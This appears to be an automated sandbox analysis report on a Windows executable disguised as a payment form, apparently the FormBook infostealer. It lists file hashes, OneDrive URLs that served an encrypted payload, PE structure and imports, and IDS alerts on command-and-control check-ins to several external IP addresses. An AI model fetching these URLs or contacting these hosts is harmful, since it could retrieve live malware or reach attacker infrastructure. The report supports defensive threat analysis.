                                                                                Preview: ..5.i.o..45..{..Iq.J...X...M.....G|%.....Q....&..H.+.....C..8.....m...fx3.'..WC...6..!.H..T...6.<...).l.&m...o............P.r1...).S..N.y.....\.x4Of,UP.......... nN..pT..v!.o........Op....a.........}..hL.]_..G......Op.R....>..R...{...G......e......=l^ls.......L.....h....z2......GU..I....u.rd6.76.}..g.**#...8.Ord6.|nN..e..}......K6....5.Wf#.AGU./..(:.(:.<.;-.m...0..g...,......tg..z}._..[Y[.....r T..H....-...rl.u...........AJ.y.u.&#.m.......=Or6.-.Y...G].......q....G.....H.jC_.\.Y....B..vo..$3........l....-.G...=o..5.....T....2.O&9nde......3...S.T.....O&+.`fo.x:.....[.UI.<...e..hM W.3..pJ...|X...&m.........v&"$).Mp...!..m..GU..IR..AQ?q.......r%.....o......}.x/.......).....O...p....@....%...........v%.....@......hJ.T.{..U..{...}.........!............0.....d~.....IP...&m...B....T.S7w..N....('..3.db~.|.v>..,...8.B.....pP.he..L...v?w..T..9+.hL.(5.&!.).........}.g.Sq.o......YR.#..,A/......Y...D....A@."!......5.6.AH....g..|.....I\.Y....<.+...... [...d
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\Fdhlajkqzshwymncekoaweuudqrkiey[2]
                                                                                Process:C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
                                                                                File Type:data
                                                                                Category:downloaded
                                                                                Size (bytes):274944
                                                                                Entropy (8bit):7.99609137175565
                                                                                Encrypted:true
                                                                                SSDEEP:6144:2WMYR+e/cgMIdaEbxn7qFOuOkfAe2Z0PjjCGKpM39s2eGXTGsG6v:2o6+a4NqFZ1Y0Pj+n7lQ
                                                                                MD5:B9CB610A00F7B9437BC7A3B900127957
                                                                                SHA1:BBAF86A0E368B1A40A76EF96091BA13A1C17412A
                                                                                SHA-256:C0411F5E7F35FFED8CE1FDCFEFF7E0C90FCCA62B89895BD14314705EF8404A64
                                                                                SHA-512:5E17785DD104A86364F0A643AEDEF1B5594173EEF10E1587EDE56493374B33ACE3CEF6CF47C7E3902E9E279CD307E76D3420EFB12D266D8E837BC2E1E3954706
                                                                                Malicious:false
                                                                                Reputation:unknown
                                                                                IE Cache URL:https://pxqklq.sn.files.1drv.com/y4mkLxn7rt5rAMU4UB9iKe8JYK3WoQ25trQw_U7RazHCO1kZ7dxUcEFD1iAA8OXzw8SyB3SrQusR4LU0ZFzWxWioMCqVGwBJjae5bs9CJpPIMNe6Om_8fMwWEKP4rZW5wbrQcPzTkWYM1YHHhPW8Onqc0jiX1_t4aam6YqFAdqwsW3k8YdV57TV8VHNdFub0e5vQACs0NHaEp_vAzUehY4hwg/Fdhlajkqzshwymncekoaweuudqrkiey?download&psid=1
                                                                                Preview: ..5.i.o..45..{..Iq.J...X...M.....G|%.....Q....&..H.+.....C..8.....m...fx3.'..WC...6..!.H..T...6.<...).l.&m...o............P.r1...).S..N.y.....\.x4Of,UP.......... nN..pT..v!.o........Op....a.........}..hL.]_..G......Op.R....>..R...{...G......e......=l^ls.......L.....h....z2......GU..I....u.rd6.76.}..g.**#...8.Ord6.|nN..e..}......K6....5.Wf#.AGU./..(:.(:.<.;-.m...0..g...,......tg..z}._..[Y[.....r T..H....-...rl.u...........AJ.y.u.&#.m.......=Or6.-.Y...G].......q....G.....H.jC_.\.Y....B..vo..$3........l....-.G...=o..5.....T....2.O&9nde......3...S.T.....O&+.`fo.x:.....[.UI.<...e..hM W.3..pJ...|X...&m.........v&"$).Mp...!..m..GU..IR..AQ?q.......r%.....o......}.x/.......).....O...p....@....%...........v%.....@......hJ.T.{..U..{...}.........!............0.....d~.....IP...&m...B....T.S7w..N....('..3.db~.|.v>..,...8.B.....pP.he..L...v?w..T..9+.hL.(5.&!.).........}.g.Sq.o......YR.#..,A/......Y...D....A@."!......5.6.AH....g..|.....I\.Y....<.+...... [...d
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\Fdhlajkqzshwymncekoaweuudqrkiey[1]
                                                                                Process:C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe
                                                                                File Type:data
                                                                                Category:downloaded
                                                                                Size (bytes):274944
                                                                                Entropy (8bit):7.99609137175565
                                                                                Encrypted:true
                                                                                SSDEEP:6144:2WMYR+e/cgMIdaEbxn7qFOuOkfAe2Z0PjjCGKpM39s2eGXTGsG6v:2o6+a4NqFZ1Y0Pj+n7lQ
                                                                                MD5:B9CB610A00F7B9437BC7A3B900127957
                                                                                SHA1:BBAF86A0E368B1A40A76EF96091BA13A1C17412A
                                                                                SHA-256:C0411F5E7F35FFED8CE1FDCFEFF7E0C90FCCA62B89895BD14314705EF8404A64
                                                                                SHA-512:5E17785DD104A86364F0A643AEDEF1B5594173EEF10E1587EDE56493374B33ACE3CEF6CF47C7E3902E9E279CD307E76D3420EFB12D266D8E837BC2E1E3954706
                                                                                Malicious:false
                                                                                Reputation:unknown
                                                                                IE Cache URL:https://pxqklq.sn.files.1drv.com/y4mj8AJZgDUOFh7ajEDgCq1bLm7Z8edfPevUl7EGMXxtkPP7nYLjeb0ciPjgWKu3NdM3WKjQjlL9RXVI1GMBzv7efqrBsI3QdxI_iq4_CcGMHsJ4N1Xp1sSs--ooJ28LjSr_JYxWCPY19opQOPLoHVYrRhlN8ZpjsYoF18E2Jr0L7DJqNIP1JdOGaNUmCPP0eOfzgnf8VQYwUHUun1Frlu4fw/Fdhlajkqzshwymncekoaweuudqrkiey?download&psid=1
                                                                                Preview: ..5.i.o..45..{..Iq.J...X...M.....G|%.....Q....&..H.+.....C..8.....m...fx3.'..WC...6..!.H..T...6.<...).l.&m...o............P.r1...).S..N.y.....\.x4Of,UP.......... nN..pT..v!.o........Op....a.........}..hL.]_..G......Op.R....>..R...{...G......e......=l^ls.......L.....h....z2......GU..I....u.rd6.76.}..g.**#...8.Ord6.|nN..e..}......K6....5.Wf#.AGU./..(:.(:.<.;-.m...0..g...,......tg..z}._..[Y[.....r T..H....-...rl.u...........AJ.y.u.&#.m.......=Or6.-.Y...G].......q....G.....H.jC_.\.Y....B..vo..$3........l....-.G...=o..5.....T....2.O&9nde......3...S.T.....O&+.`fo.x:.....[.UI.<...e..hM W.3..pJ...|X...&m.........v&"$).Mp...!..m..GU..IR..AQ?q.......r%.....o......}.x/.......).....O...p....@....%...........v%.....@......hJ.T.{..U..{...}.........!............0.....d~.....IP...&m...B....T.S7w..N....('..3.db~.|.v>..,...8.B.....pP.he..L...v?w..T..9+.hL.(5.&!.).........}.g.Sq.o......YR.#..,A/......Y...D....A@."!......5.6.AH....g..|.....I\.Y....<.+...... [...d

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.145527542958135
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                File name:Form_TT_EUR57,890.exe
                                                                                File size:702464
                                                                                MD5:811ea41e60760a97b5f28973618728fe
                                                                                SHA1:ec072cb8cb67785ca7fba45d36c6264b7eed65cd
                                                                                SHA256:e6bd5f8475731bcca5f6b74327a68ee4b7fa5b0662521feff1d92424da149151
                                                                                SHA512:150a47aff7f971b4361b59c377358e0b3f29e713f89c8789bea38d8bf916d71d5ccaf8165756422999213f54df69f1e0d1e89d120351b162fe03256660ac681f
                                                                                SSDEEP:12288:CHuv6TaXda6yswPypNz+w5cUsCPFExCUaMliTE5pPYrfFyA:466ga6ys0Kz+wHpzUEoRYrt
                                                                                File Content Preview:MZ......................@...............................................!..L.!...... ....... .... .. ... ..... ................................................................................................................................................

                                                                                File Icon

                                                                                Icon Hash:0c4a4c67c3262b09

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x460844
                                                                                Entrypoint Section:.itext
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                                DLL Characteristics:
                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:1379487e213e9660a192f7f9b27f1132

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                add esp, FFFFFFF0h
                                                                                mov eax, 0045F37Ch
                                                                                call 00007F6AF0AF0BC5h
                                                                                mov eax, dword ptr [00462B68h]
                                                                                mov eax, dword ptr [eax]
                                                                                call 00007F6AF0B43629h
                                                                                mov ecx, dword ptr [00462C58h]
                                                                                mov eax, dword ptr [00462B68h]
                                                                                mov eax, dword ptr [eax]
                                                                                mov edx, dword ptr [0045E404h]
                                                                                call 00007F6AF0B43629h
                                                                                mov eax, dword ptr [00462B68h]
                                                                                mov eax, dword ptr [eax]
                                                                                call 00007F6AF0B4369Dh
                                                                                call 00007F6AF0AEEB3Ch
                                                                                lea eax, dword ptr [eax+00h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x670000x285c.idata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x730000x40df8.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x6b1c.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x6b0000x18.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x677700x644.idata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x5e5940x5e600False0.526893625828data6.5382475039IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .itext0x600000x88c0xa00False0.54296875data5.60921522717IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .data0x610000x1cec0x1e00False0.400911458333data3.84644398704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                .bss0x630000x37740x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                .idata0x670000x285c0x2a00False0.310732886905data5.09189441597IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                .tls0x6a0000x340x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x6b0000x180x200False0.05078125data0.20448815744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x6c0000x6b1c0x6c00False0.617078993056data6.66398487193IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x730000x40df80x40e00False0.331636109104data7.08115442242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_BITMAP0x735980x1d0dataEnglishUnited States
                                                                                RT_BITMAP0x737680x1e4dataEnglishUnited States
                                                                                RT_BITMAP0x7394c0x1d0dataEnglishUnited States
                                                                                RT_BITMAP0x73b1c0x1d0dataEnglishUnited States
                                                                                RT_BITMAP0x73cec0x1d0dataEnglishUnited States
                                                                                RT_BITMAP0x73ebc0x1d0dataEnglishUnited States
                                                                                RT_BITMAP0x7408c0x1d0dataEnglishUnited States
                                                                                RT_BITMAP0x7425c0x1d0dataEnglishUnited States
                                                                                RT_BITMAP0x7442c0x1d0dataEnglishUnited States
                                                                                RT_BITMAP0x745fc0x1d0dataEnglishUnited States
                                                                                RT_BITMAP0x747cc0xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                RT_ICON0x748b40x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                RT_ICON0x74d1c0x988dataEnglishUnited States
                                                                                RT_ICON0x756a40x10a8dataEnglishUnited States
                                                                                RT_ICON0x7674c0x25a8dataEnglishUnited States
                                                                                RT_ICON0x78cf40x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                RT_RCDATA0x7cf1c0x10data
                                                                                RT_RCDATA0x7cf2c0x36679GIF image data, version 89a, 233 x 216EnglishUnited States
                                                                                RT_RCDATA0xb35a80x2a0data
                                                                                RT_RCDATA0xb38480x316Delphi compiled form 'TForm1'
                                                                                RT_GROUP_ICON0xb3b600x4cdataEnglishUnited States
                                                                                RT_MANIFEST0xb3bac0x245XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                Imports

                                                                                DLLImport
                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                kernel32.dlllstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                kernel32.dllSleep
                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                winmm.dllmixerSetControlDetails, mixerOpen, mixerGetNumDevs, mixerGetLineInfoA, mixerGetLineControlsA, mixerGetDevCapsA, mixerGetControlDetailsA, mixerClose

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                08/03/21-16:17:15.387608TCP1201ATTACK-RESPONSES 403 Forbidden804975823.227.38.74192.168.2.6
                                                                                08/03/21-16:17:20.471643TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                08/03/21-16:17:20.471643TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                08/03/21-16:17:20.471643TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975980192.168.2.634.102.136.180
                                                                                08/03/21-16:17:20.586126TCP1201ATTACK-RESPONSES 403 Forbidden804975934.102.136.180192.168.2.6
                                                                                08/03/21-16:17:31.564062TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.623.27.129.115
                                                                                08/03/21-16:17:31.564062TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.623.27.129.115
                                                                                08/03/21-16:17:31.564062TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.623.27.129.115
                                                                                08/03/21-16:17:37.249469TCP1201ATTACK-RESPONSES 403 Forbidden804976134.98.99.30192.168.2.6
                                                                                08/03/21-16:17:42.360260TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.686.105.245.69
                                                                                08/03/21-16:17:42.360260TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.686.105.245.69
                                                                                08/03/21-16:17:42.360260TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.686.105.245.69
                                                                                08/03/21-16:17:47.490042TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.635.186.238.101
                                                                                08/03/21-16:17:47.490042TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.635.186.238.101
                                                                                08/03/21-16:17:47.490042TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.635.186.238.101
                                                                                08/03/21-16:17:47.603698TCP1201ATTACK-RESPONSES 403 Forbidden804976335.186.238.101192.168.2.6
                                                                                08/03/21-16:17:57.380607ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                08/03/21-16:17:59.170248ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                08/03/21-16:18:07.727357TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.664.190.62.111
                                                                                08/03/21-16:18:07.727357TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.664.190.62.111
                                                                                08/03/21-16:18:07.727357TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.664.190.62.111
                                                                                08/03/21-16:18:18.021646TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.6
                                                                                08/03/21-16:18:23.209711TCP1201ATTACK-RESPONSES 403 Forbidden804976734.102.136.180192.168.2.6
                                                                                08/03/21-16:18:43.720793TCP1201ATTACK-RESPONSES 403 Forbidden804977023.227.38.74192.168.2.6
                                                                                08/03/21-16:18:48.757162TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.634.102.136.180
                                                                                08/03/21-16:18:48.757162TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.634.102.136.180
                                                                                08/03/21-16:18:48.757162TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.634.102.136.180
                                                                                08/03/21-16:18:48.870420TCP1201ATTACK-RESPONSES 403 Forbidden804977134.102.136.180192.168.2.6
                                                                                08/03/21-16:18:59.144074TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.623.27.129.115
                                                                                08/03/21-16:18:59.144074TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.623.27.129.115
                                                                                08/03/21-16:18:59.144074TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977280192.168.2.623.27.129.115
                                                                                08/03/21-16:19:04.509962TCP1201ATTACK-RESPONSES 403 Forbidden804977334.98.99.30192.168.2.6
                                                                                08/03/21-16:19:09.548891TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.686.105.245.69
                                                                                08/03/21-16:19:09.548891TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.686.105.245.69
                                                                                08/03/21-16:19:09.548891TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.686.105.245.69
                                                                                08/03/21-16:19:14.630343TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977580192.168.2.635.186.238.101
                                                                                08/03/21-16:19:14.630343TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977580192.168.2.635.186.238.101
                                                                                08/03/21-16:19:14.630343TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977580192.168.2.635.186.238.101
                                                                                08/03/21-16:19:14.746183TCP1201ATTACK-RESPONSES 403 Forbidden804977535.186.238.101192.168.2.6
                                                                                08/03/21-16:19:24.145283ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                08/03/21-16:19:27.820551ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Aug 3, 2021 16:17:10.181346893 CEST4975780192.168.2.652.58.78.16
                                                                                Aug 3, 2021 16:17:10.203625917 CEST804975752.58.78.16192.168.2.6
                                                                                Aug 3, 2021 16:17:10.203793049 CEST4975780192.168.2.652.58.78.16
                                                                                Aug 3, 2021 16:17:10.204705954 CEST4975780192.168.2.652.58.78.16
                                                                                Aug 3, 2021 16:17:10.226679087 CEST804975752.58.78.16192.168.2.6
                                                                                Aug 3, 2021 16:17:10.226708889 CEST804975752.58.78.16192.168.2.6
                                                                                Aug 3, 2021 16:17:10.226718903 CEST804975752.58.78.16192.168.2.6
                                                                                Aug 3, 2021 16:17:10.227013111 CEST4975780192.168.2.652.58.78.16
                                                                                Aug 3, 2021 16:17:10.227051020 CEST4975780192.168.2.652.58.78.16
